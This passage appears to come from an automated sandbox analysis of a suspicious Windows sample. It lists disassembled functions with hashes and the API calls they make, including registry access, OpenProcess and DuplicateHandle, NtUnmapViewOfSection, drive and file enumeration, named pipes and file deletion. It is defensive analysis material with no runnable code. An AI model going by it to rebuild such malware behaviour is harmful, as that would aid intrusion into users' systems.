  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32B25, Relevance: 10.6, APIs: 7, Instructions: 98 Total matches: 51file
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
